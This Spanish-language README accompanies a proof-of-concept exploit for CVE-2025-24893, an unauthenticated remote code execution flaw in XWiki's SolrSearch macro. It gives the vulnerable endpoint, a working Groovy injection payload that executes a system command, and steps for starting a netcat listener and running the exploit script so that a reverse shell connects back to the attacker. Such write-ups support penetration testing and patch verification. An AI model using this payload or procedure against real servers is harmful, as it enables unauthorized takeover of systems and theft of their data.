
Exploit de prueba de concepto para CVE-2025-24893, una vulnerabilidad de ejecución remota de código sin autenticación en XWiki mediante el manejo inseguro de expresiones Groovy en la macro SolrSearch.
⚠️ Ejecución Remota de Código No Autenticada en XWiki
🛠️ Implementación del PoC por @dollarboysushil
CVE-2025-24893 es una vulnerabilidad crítica de RCE en XWiki, causada por el manejo inseguro de expresiones Groovy dentro de la macro SolrSearch. Un atacante puede inyectar código Groovy a través de una solicitud GET manipulada, lo que conduce a ejecución remota de código (sin requerir autenticación).
La vulnerabilidad reside en la macro SolrSearch (Main.SolrSearch) de XWiki, que maneja la entrada de búsqueda mediante una evaluación Groovy insegura. La macro no sanea la entrada proporcionada por el usuario, lo que permite la ejecución arbitraria de código.
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
Un atacante puede inyectar código Groovy en el parámetro text, que se evalúa en el lado del servidor debido al manejo inadecuado de la entrada dentro del sistema de macros.
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
Esto conduce a una Ejecución Remota de Código (RCE) no autenticada en instancias XWiki vulnerables.
El objetivo vulnerable es una instancia de XWiki que ejecuta la versión 15.10.8, afectada por CVE-2025-24893.

Inicie un listener de Netcat en la máquina del atacante para capturar la conexión de la reverse shell:
nc -lvnp 1337

Ejecute el script de explotación CVE-2025-24893-dbs.py para enviar el payload RCE basado en Groovy al endpoint XWiki vulnerable.

Tras una ejecución exitosa, la reverse shell se conectará de vuelta al listener, otorgando al atacante acceso remoto al servidor.
